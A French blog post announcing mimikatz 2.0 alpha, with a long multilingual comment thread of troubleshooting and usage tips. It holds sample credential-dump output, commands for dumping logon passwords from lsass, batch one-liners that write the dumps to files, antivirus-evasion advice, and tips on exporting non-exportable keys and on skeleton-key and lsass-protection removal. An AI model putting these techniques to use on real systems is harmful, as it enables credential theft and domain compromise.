# mimikatz 2.0 vient de sortir en version alpha

## Pour les pressés cherchant des mots de passe…

mimikatz # privilege::debug
Privilege '20' OK

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Domain   : vm-w7-ult-x
* LM       : d0e9aee149655a6075e4540af1f22d3b
* NTLM     : cc36cf7a8514893efccd332446158b1a
* SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Domain   : vm-w7-ult-x
...

## 501 réflexions sur « mimikatz »

• many thanks for your explain: « it keeps them in memory ». If user do not login and logout we can not exploy this tool.

1. Input  » ^Z  » in mimikatz.exe command, it’s will run always you ctrl-c.

• i run it as administrator win7 sp1
but error
Hints are as follows:
Demande d’ACTIVATION du privilege: SeDebugPriviliege:OK
Erreur:Impossible d’injecter !; 拒绝访问
Erreur:pas ou plus de communication etablie

How so? thank

• this is full console output.

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 580
Erreur : Impossible d’injecter ! ; (0x00000005) 拒绝访问。

Erreur : pas ou plus de communication établie

2. Ping : 通杀WIN服务器得明文密码神器

3. secpol.msc -> Local Policies -> User Rights Assignments -> Debug Programs
This is also how you stop Pass-The-hash from working too.
I’ve tried on Win7 and XP SP3 (english) and I get this error on XP
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 640
Erreur : Impossible d’injecter ! ; (0x00000008) Not enough storage is available to process this command.
Same wtih Win7(64-bit) only the hex is different
Erreur : Impossible d’injecter ! ; (0xc0000022) {Access Denied} A process has requested access to an object, but has not been granted those access rights.

• Nevermind :) I was not using the 64-bit (x64) version on my 64-bit OS.
Also to work around removing the sedebug priv using group policy and or secpol.msc, you can run as system (psexec -s cmd.exe) and everything works well. Very good tool, I hope you make even more additions! (@dumpall would be cool too, dump anything and everything this tool has to offer)
-william

• 0x00000008 is from NT 5 RDP session, not because debug right removed ;)
in both case : psexec -s XXX … no need of debug right, and bypass session isolation in RDP ;)

• Thank’s !!! I’ve already relied on manual Stack creation and get it worked, but with NT 6, I prefer RtlCreateUserThread :)

4. Isn’t this how Windows can send HTTP-Authentication using IE without prompting for the password? If so, could a program like Firefox, launched as the same user who is logged on, read those credentials and also pass HTTP-authentication without being prompted? This could add functionality to something like FF if this was so, could it not? I mean IE does it…
-mandingo-

• In some way yes. But Windows does not need it for Kerberos or NTLM auth. Just for some Digest auth.
FireFox can use Kerberos and NTLM auth with SSO (see network.negotiate-auth.*), maybe wdigest too ?
In all case, no need for hack for that, Windows allow « normal » API to obtain responses to challenges.

5. C:\Program Files\WinRAR\ts\Win32&gt;mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 452
Erreur : Impossible d'injecter ! ; (0x00000008) 存储空间不足，无法处理此命令。

mimikatz #

help me

6. FYI, Windows 8 (dev-preview) is working for me so far. Haven’t tried all the commands yet but so far so good. Is there a way to run all commands planned? Maybe output to a single file?
-mandingo-

• I’ve some surprises for windows 8 consummer preview :)
they’re are some problem with the current version, internal is 90% for x64, and 70% x86.

7. Пополним коллекцию благодарностей на иностранных языках :)
Спасибо!

8. Hey, how about a natively english version? I had french in school, but it’s a bit rusty tbh ;)

9. LOL,C’est un logiciel qui peut faire beaucoup de trucs,ça me plais beaucoup ^.^
mais il y a trop de méthodes TT，chaque fois je dois venir ici pour chercher le rappel ,peut-être c’est moi qui me suis trompé ,puisque la langue française est compliqué pour nous ,toute façon il faut apprendre .
Bon courage et je vous souhaite une très bonne année 2012 .

10. Very nice work. I successfully got clear text passwords by injecting into LSASS on Windows 2008 R2, however, I had a problem on Windows 7 x64. I launched a local cmd.exe shell as Local System by using PsExec. From there I launched mimikatz. After typing @getLogonPasswords, the data was there but the wdigest passwords were completely garbled text. I guess something went wrong with the injection. I wonder if it has anything to do with ASLR.

• No problem with ASLR ;) It must be unicode or incorect unicode string for computer account, but appear to be valid in unicode… :( (try chcp before ;))
Why did you use psexec for get system ? you can use privilege::debug

• Yes, privilege::debug worked better. On this PC, I was only able to retrieve my smartcard PIN, because I don’t log in with my password. :)

• SecureID ?
mimikatz displayed your pin code of RSA SecureID ? (or entire pin + code ?)
If so, I’ll LOVE this provider !

• Yeah — it showed just the portion of the PIN that I type to login/unlock my PC. It did not of course display the automatically changing code that is shown on the LCD display. :)

11. Note that I must have recently unlocked my PC in order for the RSA SecureID PIN to show up — if I have not logged in or unlocked the PC within 30 minutes or so, the PIN does not appear in the list. Alright, here is my mimikatz output. I ran it first, and did not see RSA PIN. Then, I locked my workstation and then unlocked it, then I ran @getLogonPasswords again. Then I did see my RSA PIN displayed. I have tried to change names and hashes to protect the innocent. :)

mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :
tspkg :         n.t. (LUID KO)
mimikatz # @getLogonPasswords

Authentification Id         : 0;618713
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :       THIS_IS_MY_RSA_PIN
tspkg :         n.t. (LUID KO)

Authentification Id         : 0;613648
Package d'authentification  : Kerberos
Utilisateur principal       : demoUser
Domaine d'authentification  : FakeDomain
msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3 }
wdigest :       THIS_IS_MY_RSA_PIN
tspkg :         n.t. (LUID KO)
• So funny :), maybe you can try @getLogonPasswords full for « full » informations.
Is your NTLM(RSA_PIN) same as msv1_0 NTLM hash ?

I’m @PHDays, unfortunately I cannot test it now :)

• That’s a good question… I’ll have to crack it with something like ighashgpu. Since I know what it is, it should be pretty easy to crack the hash. :)

• You don’t have to do that !
whent it’s available, take the cleartext pin code , hash it in NTLM, compare :)

12. Sorry, I got distracted with other things…

No it’s odd – mimikatz will dump my SecureID PIN as the « wdigest » but the corresponding NTLM hash does not match either the PIN or my user account password. I don’t know what it is.

13. congratulations!! nice work!!
just one request: can you create a full english version?
Merci :D

14. i download your source code .but i find something could not find ,link the function GetMSVLogonData, can you show how does it work ? thank you ! :)

15. Ping : 神器mimikatz | WG1博客

16. Ping : 神器mimikatz | 冰锋刺客

17. Ping : 神器mimikatz | 潇湘博客

18. mimikatz вещь зачётная!
Посмотрел презентацию, увидел слово СПАСИБО!
т.ч. может поймёшь) Большое спасибо тебе!

19. Ping : 问君几多愁 » msf中使用MIMIKATZ

20. Ping : 神器 – mimikatz | 小兮博客

21. Mimikatz FTW! Allowed me to circumvent my IT department’s issuing of a new RSA certificate when I changed my home PC, thus saving much time and stress. Merci!

22. Bonjour,

Pour info, mimikatz ne fonctionne pas sous windows 2003 enterprise (english) en version pré-servicepack.
“The procedure entry point EncodePointer could not be located in the dynamic link library KERNEL32.dll”. La version de la dll est 5.2.3790.

Cela fonctionne bien une fois le SP2 installé (SP1 non testé).

Un grand merci pour l’outil!

23. 这全是鸟语啊，外国的黑客，你们好！你说的我完全不懂昂，真不知道你们的鸟语，你怎么学会的呢！

24. hello – any chances to have this tool in english? :) thx

25. If you press the TAB key can make up the keywords, the software will be best

26. Ping : 扫雷神器 – mimikatz

27. Can you attack remote PC’s with this or you have to be on the actual clients machine to run this? You would also need to have admin rights I’m assuming.

Good tool, now just trying to see if it can be executed to gain access to a remote pc. I’m the IT guy at work.

Keep up the good work.

28. Is there any way to run mimikatz in memory instead of copying it to the remote machine?

29. Microsoft Forefront is detecting the Alpha as well as RC of Mimikatz, is there a way we can run it without encrypting the exe to bypass the AV.

30. What commandline format in new alpha version ?

mimikatz.exe privilege::debug sekurlsa::logonPasswords exit >> result.txt

in batch mode is crash

31. Ping : 記某次主機提權 | Dave's Blog

32. Is there any effective way to protect against this technique?

By the way, congratulations for the tool.

33. Will I be able to export a Certificate along with it’s private key even if the key isn’t exportable and import the Certificate to another computer?

Thanks.

• Well is there any way that you know for sure? I need to format my computer and reinstall windows, but before I do, I want to make sure that I will be able to use my certificate again.

Is there a way to do this?

Thanks.

34. Hi mate, awesome tool. any chance it will be able to dump domain user hashes (usually from ActiveDirectory) in NTLM / LM format? I have yet to find a program which is lightweight or small that can do it would be great man!

keep it up!

35. Is it possible to convert from an exe into native powershell?

• PowerShell tool: RWMC – Reveal Windows Memory Credentials-https://github.com/giMini/RWMC

36. why is it that I cannot unzip these binaries? Am I missing something? Tyring to use it in conjunction with USB rubber ducky and it doesn’t seem to want to unzip with 7zip or RAR

• Nevermind I got it. Must have been my AV not allowing a full download. Thanks for the great tool!

37. mimikatz # sekurlsa::minidump c.dmp
Switch to MINIDUMP

ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) !=
PROCESSOR_ARCHITECTURE_INTEL (0)
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

mimikatz #
38. Any new information on how to use the mimilib.dll

Thanks

39. I’m struggling with 2.0 version in order to export certificates. The « crypto::certifcates » only lists me certificates stores, but no idea how to export… Please advice

40. Hi, thank you for this tool. What can you do with high protected certificates?
Do you know what function verifies the password for export private key?

• ok, do you know how is the password used to encrypt and where is it(or its hash) stored?

41. Hey =)
it is posible to use mimikatz with a Ram Dump?
If not, this would be a nice feature.

Greets from Germany
Chris

• Thanks, but i only have complete images in RAW Format. Do you know any way to extract passwords out of that?

• MANY THANKS TO YOU to Programm the WinDbg extension!!! i saw a post yesterday on twitter with a comment to with extension, today i checked it out. It is VERY NICE! a had a little Fight with the wow64exts in WinDbg but finally it Worked! Many thanks an greets from Germany!
Greets Chris

42. Excellent l’information pour le hash SHA1 DPAPI! Reste encore la question comment il est généré depuis Windows Vista, vu que ce n’est plus « simplement » SHA1(UNICODE(mot de passe))?

• Merci pour ces précisions, je vais regarder cela, ainsi que l’option sekurlsa::dpapi de plus près dès que j’en ai le temps ;-)

43. (sorry I write in English, mon français n’est pas très bon)

I’ve seen that Windows 8.1 is supported in alpha 2.0 version.
However, clear password dump is not available anymore.

Is because of a new protection (or a better handle) of Windows 8.1?

I have found no information regarding the new countermeasures in Windows 8.1.

And congrats for the great and so useful tool!

• mimikatz dumps password when they’re in memory, when they’re not…. ;)

Windows 8.1 does not keep passwords in memory as usual. Only LiveSSP as I’ve seen (or when you enable Credentials Delegations)

44. Having a buggy issue with mimikatz alpha 2.0 x64 and Windows 8.1 enterprise.

When using either procdump with sekurlsa::minidump… or mimikatz alone to pull lsass.exe… I do not get any passwords from a Windows 8.1 x64 system that has just been logged into. No errors, just « password: (null) » everywhere I would expect a password.

If I lock the system, and unlock using a password… then run procdump or mimikatz again… I DO get a correct password.
It seems the first logon password is not stored in lsass process memory, or not at the offset that mimikatz is looking. But subsequent credential input is properly retrieved (such as lock and unlock).
In Windows 7 x64… works perfectly. Can pull passwords from very first logon.

• As you’ve seen, this is not a mimikatz issue ; Windows 8.1 does not store « by default » passwords in memory (see previous comment)
Like in NT5 with Kerberos provider, some passwords fields are populated after unlocking.

You can check this with : sekurlsa::searchpasswords.
It searches the whole process for credentials, and it’s provider / offset independent.

45. I am using the new version. I try to export a certificate from the computer store, but cannot figure out how to change the store. Is there a way to do this?
Thank you for the tool,
-D

mimikatz # crypto::stores
Asking for System Store ‘CERT_SYSTEM_STORE_CURRENT_USER’ (0x00010000)

• you can use /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE by example (and /export to export ;))

46. Has something changed with the new version?

It used to work on my Win7 Enterprise 64bit, but suddenly not anymore. (running the 64bit version). It looks like the password is still hashed / encrypted.. Anyone else have this problem? Other than that, excellent tool, much respect!

Merci pour ton feedback!

Output example (I replaced some info with XXXXXXXXXX)

User Name         : XXXXXXXXXX
Domain            : NT Service
SID               : S-1-5-80-997390408-XXXXXXXXXX-3119169589-2253446180-22265637
86
msv :
[00000003] Primary
* Domain   : UK
* LM       : 00000000000000000000000000000000
* NTLM     : 3bdf6dc3f414a299b1acfdaa80d8030d
* SHA1     : 3b6264001febc9917d700cb04f1307667fcfb050
tspkg :
* Domain   : UK
* Password : b2 28 3b f5 eb 00 d3 31 1f 4b 57 1d 86 ca 1f ca 8f c1 36 a
1 cf e0 73 20 70 a6 47 12 de 25 37 b8 48 9c 3f 3e 06 03 64 d0 5c e6 cd 28 fc d3
38 ac 08 a0 bc bb 5a bf b7 7b d3 0b 92 7b 56 32 26 c0 d8 b0 f1 8a ce cb b5 df ce
a4 36 69 b8 be f7 55 4a 03 05 8b a7 79 d8 de 11 06 5e e3 27 9d f7 9f 81 dd a0 2
a 1f 83 3b a2 75 ee 08 7d e3 a5 cf 17 29 73 77 8a d8 dc 59 8f 3d 09 70 f9 1a d5
1a 23 5c fa 03 7b b0 18 d4 3f da d4 1e 94 2d 0b b1 e7 6f f1 f3 1e a7 ab 21 0a 36
c6 64 05 5e 11 cf 9a cf f5 42 f6 c9 ed 0d ee a9 4a 3a 6c 44 cf d5 f1 c8 fd eb 3
6 a6 93 ee c5 14 d1 6f b1 0e 01 30 44 3c 3d 3d c4 30 e4 77 e8 5e 12 7a 8f ee 60
c2 3d dd 84 a5 6a 75 07 32 ff bd 84 84 8f ff 8c 17 a1 54 7a fe dc 52 74 b9 cb 6e
d2 62 6c d6 ec 35 b6
• Hi Michel,

Services passwords, computers passwords, and some others are not necessary « human readable ». Nobody type them ! so in some cases Windows generates random « binary » passwords !

In your case b2 28 3b f5 [...] d6 ec 35 b6 is the real binary passwords =)

const BYTE pwd[] = {0xb2, 0x28, 0x3b, 0xf5, [...], 0xd6, 0xec, 0x35, 0xb6};
SHA_CTX shactxInput;
SHA_DIGEST shaInput;

A_SHAInit(&shactxInput);
A_SHAUpdate(&shactxInput, pwd, sizeof(pwd));
A_SHAFinal(&shactxInput, &shaInput);

kull_m_string_wprintf_hex(shaInput.digest, SHA_DIGEST_LENGTH, 1);

Output is : 3b 62 64 00 1f eb c9 91 7d 70 0c b0 4f 13 07 66 7f cf b0 50, your SHA1 ;)
mimikatz credentials output routine try to detect if the password is a printable string, if not, it display it in hex.

47. Hello again!

Thanks so much for the quick reply! This still leaves me with a couple of questions though:
1) I thought Mimikatz would look for the password stored in memory, which is supposed to be cleartext.
2) Mimikatz used to work on my computer perfectly, and suddenly it only produces hashes (Is the previous version of Mimikatz still available somewhere?)
3) A SHA1 hash is (I think) very hard to decrypt, so Mimikatz doesn’t always work on all systems?

Thanks again for the feedback!

Cordialement, Michel

• Mes excuses! J’ai vu que je peux encore retrouver le mot de passe avec la nouvelle version MK :) Vous pouvez supprimer mes deux commentaires si vous voulez.

Merci de nouveau et bàt, Michel.

48. Ping : HackLab

• Yep, depuis Avril 2012… heureusement le code source est disponible ;)
Pour Symantec, ce que j’avais adoré à l’époque :
« The tool allows an attacker to perform the following actions on the computer:

• Cheat at minesweeper. »
49. Will mimikatz work on ARM chips? Such as a Chromebook?

50. I love Mimikatz it is a great tool.

I like to procdump memory and then use the minidump function to process the dump off the client so even if Mimikatz is picked up by AV and cant be run locally it will still work! ;-)

But I sometimes get a « MAJOR VERSION » error.

Is this because I am using the wrong version of Mimikatz?

Or does it mean that I am trying to work with a version of windows such as XP which doesnt natively have the Tkspg, Wdigest or Kerberos TGT functionality and it is the version of Windows that is wrong?

51. If I dont run privilege::debug I get « ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005 ». Is there somewhere in your blog explaining whats going on here that requires it to be run first?

52. Ping : Anonyme

53. Ping : 神器mimikatz 2.0 - 中国X黑客小组

54. save this file as anyname.bat and run as administrator with CMD.
@echo off
For /f « tokens=2-4 delims=/  » %%a in (‘date /t’) do (set mydate=%%c-%%a-%%b)
For /f « tokens=1-2 delims=/: » %%a in (‘time /t’) do (set mytime=%%a%%b)
mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%

55. Est-il possible d’utiliser seulement la dll mimilib pour récupérer les mots de pass par programmation, Et si oui, y-a-t-il un descriptif des fonctions inclues dans la dll et des paramètres à utiliser?

• Ce n’est clairement pas l’objectif de la DLL… mais que ce soit pour mimikatz.exe ou mimilib.dll, le code source est ouvert ;)

56. Hello, seems great, but how can i make it FUD ?
do you have a nice crypter to do it ?
because for the moment, Windows delete it instantly :(
(avast i assume)

thanks :)

57. thank you for mimikatz! I’ve problem to export computer certificare, i can export only user certificate. Is it possibile to change store system to local machine? I haven’t find the command for that.

58. Hi – great work I love the tool :)

I just have one question, what the heck does mimikatz mean? :D

59. btw – I got a question for you. Can Mimikatz generate Service Tickets (rather than Golden TGTs)?

60. Ping : Anonyme

61. Hello guys!
First of all, this crypto tool is simply fantastic!!!!

I have a simple question:
Is there any way to export the private key which is inside a eToken or smartcard? I tried the tool, but even with the capi and cng patches it didn’t work.

Is there anything that can be done to export a private key inside an eToken?

Thanks
HJ

• I was also wondering if this is possible. I’ve seen this comment – « Some smartcard crypto providers can report a successfull private export (it’s not, of course :wink:) », so I’m not sure if that means there is no way to do it, or additional steps need to be taken. Could anyone elaborate please?

• Responding to my own post, after further reading it looks like even if you are using a software based smartcard crypto provider, part of the key is stored in the trusted platform module chip soldered to your motherboard which is considered secure (it’s been hacked through extreme processes and measures over a period of months and is not a practical exploit).

Someone please correct me if I am wrong!

62. create bat script and run using cmd
@echo off mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > %random%%random%.txt

63. Bonjour

Je créé un minidump via le taskmanager et voici ce que j’obtiens aprés sur la même machine …. Merci de m’éclairer ;-)

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Oct 31 2014 13:30:06)
.## ^ ##.
## / \ ##  /* * *
## \ / ##   Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
'## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
'#####'    Microsoft BlueHat edition!       with 14 modules * * */

mimikatz # sekurlsa::minidump c:\temp\lsass.dmp
Switch to MINIDUMP : 'c:\temp\lsass.dmp'

Opening : 'c:\temp\lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (9) != PROCESSOR_ARCHITECTURE_INTEL (0)
64. Merci de ta réponse, Quoiqu’il en soit BRAVO pour ton travail, je pense que mon Pb vient du fait de la compilation sous VS 2013 qui est peut être par défaut en 32 bits….

65. Fantastic tool…. How would i be able to invoke the DLL to call and return the vales from c# any ideas???

66. Hi
i have a win8 laptop and passwords is not showing no more just the ntlm hash

68. When i attempt to load the CNG service on Windows 8.1, i get a nice error.

ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

I’ve got no AV running, or anything. Any ideas?

• Running into the same error in Server 2012 (not R2). I have local admin rights, disabled UAC, and disabled the UAC registry key, and have restarted a few times. Any help would be appreciated. Thank you!

mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000000)

• Looks like the patch didn’t work then. I’m still unable to export my certificate’s private keys. Anything else I can try?

69. It seems that to debug the lsass you need to be a local admin on a machine. But can this tool be used by a person on a remote computer on which that person is not a admin and still get the credentials by any means? Let’s say this is MS domain ;)

i was wondering of there are any traces of passing the ticket?
i.e. is there a special windows event or some way to find that being a domain admin that is concerned about his domain security?

• 2012不会存储明文密码，但是可以修改注册表，来抓取明文hash

set a pass and do it again you wil se it apear..

72. Ping : 提取系统明文密码 工具

73. Hi,there
i used misc::skeleton to use skeleton key on dc
but i want change the password « mimikatz » to my own password
how to change it ?

74. Ping : 问君几多愁 » msf中使用MIMIKATZ

75. hello,
thanks for the nice tool.
How can be used remotly?

76. Hey, im need help with windows 10, im need credentials to hack password, what im need to do to hack the password? answer please, thanks

• There are multiple aproaches, all of them having one thing in common. Since I don’t know you and your intentions (who knows, maybe it’s not your device, maybe it is. I can’t tell.) I’ll only give basic advice and a lead, the rest is up to you.
Keep in mind that it has been a year or two since the last time I helped someone regaining acces. So there are some variables i’m not up-to-date with.

First you should do some research on how windows works, only the basic things are required: How do the user accounts work, are they stored locally? (most likely, but I recall w10 being able to use your user account on multiple devices, I dont know w10’s behaviour when you have no internet connection and use the credentials you use for other devices too (ms account or something? ) > I expect that the user accounts and passwords are stored locally in both cases. > ask and find out how win manages passwords. (if correct, it should be possible to find out services etc used for this purpose.)

Now: first go into a search engine you find handy and effective. Research the above mentioned things.
Write down some keywords and the names of services / programs you suspect of being involved.

second: Be creative > imagine a door with a lock thats externally mounted, screws exposed.. You have with you: A set of internals including a new key and a ratchet with 2 attatchments, one thats fitted is torx and one that you found out to be usable on the screws that hold the lock in place.
>> What would you do to gain acces?

Swap something over using a commonly availlable piece of gear so you can replace or remove that what keeps you from getting in.

Good luck.

ps. I usually can’t stand people who ask prior to doing research…
You want something and don’t know how? Start learning then. All you need is availlable on the internet to read. If you don’t know why a certain method works, you don’t know what you are doing. You don’t know what you are doing, you will ‘hurt’ yourself eventually.

Also, keep things nice and don’t use the underlying method in a way that gets you in trouble. Be whise, its your own responsibillity.

77. What about when you use email to login like an outlook or other microsoft account? I tryed this tool but that account does not show.

78. incredible , also he obtained the password of other equipment that had connected to my local network
you are a god of programming !!!

79. Hello, I have DL mimikatz-2.1.0-alpha-20160506 but there is no mimikatz.exe in it???

• Bonjour, je suis du type totalement ignare, mais c’est s’il n’y a aucun .exe dans les fichiers que l’on télécharge ?
On est que deux à se poser la question, mais je trouve qu’elle mérite d’être posée…
Au fait bravo, c’est enfin un français qui code des programmes qui servent vraiment ^^. Bonne continuation

80. Thanks for the tool used it recently for windows 7 worked perfectly, but it doesn’t seem to work anymore on windows 10

81. Ping : Bookmark this | Doxsec

82. bonjour, mon nom est Jose Luis, il est bizarre parce que je suis mexicain et utiliser Google pour traduire le message, mimikatz servis dans win10?

83. Ping : 一套渗透测试资源合集 - 体验盒子

84. Hello,
You can install the tool on a USB to run in the background without noticing?

85. Hi,

I accidentaly deleted one certificate from my certificate store. I’ve private key, which stored in folder AppData\Roaming\Microsoft\Crypto\RSA\. I’ve exported « public » part of certificate with .cer ending.

If I import certificate into mmc, private key is not found. Do you think, that is possible to « extract » private key just from file, which is stored in AppData\Roaming\Microsoft\Crypto\RSA\? Thank you for answer.

86. Ping : Windows域横向渗透 – 技术宅 BLOG

87. Sir my av (avast) is detecting it any deleting it immediately and I want to run while av is still there in system(windows 7)
Pls help its my little project

Thank u for tool works fine without av

88. Hello,
I wonder how many years of experience with c++ do you have ? I would like to know
Thank you,
Wiliam

89. Hello,

first: Thanks for sharing!
But I’ve a problem. If I use the command « sekurlsa::logonpasswords » i get the Username etc.. but no password.
« tspk: » is empty.
« wdigest » Passwort shows me: « (null) »

What did I wrong? Runned the exe as admin and no Virus-Programms or that^^

90. hi, Kaspersky have found a trojan horse at the openning of mimikatz.exe….

91. Ping : 强制查看开机密码的办法

92. please add a tool for removable drive (usb and others ) in misc and override administrator security :-)
then nice work for the tools

93. Awesome job! it helped me a lot through a remote session in a machine thet needed a restart & the owner did’nt gave me the admin password, so i was in the machine in an administrator session, i’ve runed the proper commands & worked like a charm.

Now i’m tryng to experiment through non admin sessions, in my own machine, & a can’t figure it out. This is the console result:

C:\Windows\System32>cd /MIMIKATZ/mimikatz_trunk/x64

C:\MIMIKATZ\mimikatz_trunk\x64>mimikatz.exe

.#####. mimikatz 2.1.1 (x64) built on Jul 20 2017 01:37:08
.## ^ ##. « A La Vie, A L’Amour »
## / \ ## /* * *
## \ / ## Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 21 modules * * */

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz #

As you see, running cmd as admin, in a guest account, results in this error. What i’m doing wrong?

94. Ping : APT28 – WooyunDropsImage

95. HELP, When I put « Sekurlsa:: logonpasswords » I do not see the password anywhere. In the site where is « Password » says «  »

96. Ping : Blog BSSI

97. HELp,Kaspersky has locked lass.exe memory space.
What can I do to pass ka.

• emmmmmmmm…………

somehow this tool was misused by somebody to launch the BadRabbit(NotPetya) Ransomware attack……..

so this tool was also blacklisted by some antivirus company………….

98. Ping : Pentest Guide – Wiki Sec

99. Salut, je ne sais pas ou trouvé mimikatz.exe dans le zip téléchargé ou comment le faire fonctionner ? Désolé pas très fort en informatique.

• Salut,
au debut j’ai eu le même problème. J’ai téléchargé le zip comme décrit, mais je ne pouvais pas trouver mimikatz.exe. Plus tard, j’ai découvert que mon programme anti-virus a secrètement supprimé mimikatz.exe, alors j’ai désactivé le programme anti-virus et voilà: mimikatz.exe
Ma réponse est un peu en retard, mais peut-être il y a quelqu’un qui cherche encore une solution ;)
Excusez mon francais, ce sont plusieurs années depuis ma dernière lecon de francais ;)

100. not show me password on windows server 2016… why ?
help plese

101. Hello,
I couldn’t able to export certificates with non-exportable private keys in WINDOWS XP.

Details:
.#####. mimikatz 2.1.1 (x86) built on Dec 20 2017 00:17:44
.## ^ ##. « A La Vie, A L’Amour » – (oe.eo)
## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege ’20’ OK

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # crypto::keys /export
* Store : ‘user’
* Provider : ‘MS_ENHANCED_PROV’ (‘Microsoft Enhanced Cryptographic Provide
r v1.0’)
* Provider type : ‘PROV_RSA_FULL’ (1)
* CNG Provider : ‘Microsoft Software Key Storage Provider’

CryptoAPI keys :

CNG keys :

mimikatz #

BR,
Mahir

103. Hi,

I have a laptop with access to both the local administrator account and a domain user account (offline/cached credentials).

The domain user can connect to a corporate VPN which uses a certificate. I want to get the certificate which is non exportable.

When running MimiKatz as the Local admin, it does not pull off the private certificate for the domain user account (maybe because it is not the current user?).

I am not 100% sure its the private certificate I want yet as the VPN profile config refers to a Machine Cert.

Any Tips?

104. Hello,

I’ve tried to decrypt some browser passwords from my old windows 7 laptop. With the help of mimikatz I had already success with some chrome passwords, but I don’t get the clue how to crack Internet Explorer. I took the blob structure from the registry (HKCU\Software\Microsoft/Internet Explorer/IntelliForms/Storage2) containing a Facebook password and typed the following in mimikatz:

This is working fine so far, so the decrypted masterkey is stored in mimikatz’ cache. But as I try to decrypt the blob like this:

dpapi::blob /in:C:\path\to\file\with\value\from\registry /entropy:c0400e6fabb4c395ff857d0614e66508ba8ba737c5 /unprotect

…I get two errors:

ERROR kull_m_dpapi_unprotect_blob ; CryptDecrypt (0x80090005)
ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; CryptUnprotectData (0x0000000d)

What did I miss? Thanks in advance!

John

105. Ping : Blog BSSI

106. Password does not support special characters such as @

107. will it also bypass the window 8.1 and above security feature where mimikatz will not have privilege to attach to it.??

108. Hello:
Excellent work.
I have 2 questions and sorry about my little knowledge.

First, Using command: !+
will elevate privileges to run as a driver.
?This will be set permanent in Registry?
Because after running this command 2 or more times gives Error:
ERROR kull_m_service_install ; StartService (0x00000003)
,that seeme to be due to the fact that is already running/already registered.

Second Q: ,After using command :
!processprotect /process:lsass.exe /remove
,this unProtection will be permanent or just until next computer Restart.?

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.